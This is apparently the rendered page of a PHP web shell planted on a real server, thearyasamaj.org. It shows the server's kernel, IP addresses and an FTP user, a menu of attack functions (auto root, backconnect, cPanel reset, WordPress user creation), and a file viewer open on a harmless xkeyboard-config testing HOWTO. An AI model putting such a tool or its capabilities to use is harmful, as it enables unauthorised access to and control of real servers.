Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
xkeyboard-config /
[ HOME SHELL ]
Name
Size
Permission
Action
AUTHORS
510
B
-rw-r--r--
COPYING
9.03
KB
-rw-r--r--
HOWTO.testing
861
B
-rw-r--r--
HOWTO.transition
2.25
KB
-rw-r--r--
NEWS
4.8
KB
-rw-r--r--
README
1.59
KB
-rw-r--r--
README.config
7.34
KB
-rw-r--r--
README.enhancing
23.39
KB
-rw-r--r--
README.symbols
1.84
KB
-rw-r--r--
TODO
531
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : HOWTO.testing
A mini-HOWTO test the XKB config without modifying the system configuration. (Only tested with XFree86 4.3+.) First see what your configuration is. Note the model and layout. $ setxkbmap -print Then unpack the sources locally ... $ gzip -dc xkeyboard-config*.tar.gz | tar -tf - ... and change to the delivered directory $ cd xkeyboard-config-<version> Then try to load the current keyboard using the local rules $ setxkbmap -v 10 -I$PWD -rules base Now try to set different keyboards using the -model and -layout. $ setxkbmap -v 10 -I$PWD -rules base -model pc102 -layout intl Look in the file rules/base for other example models and layouts If there was a problem, you can reset the keyboard like so: $ setxkbmap -rules xfree86 -model <noted model> -layout <noted layout> If that doesn't work, you may have to log out and log back in.
Close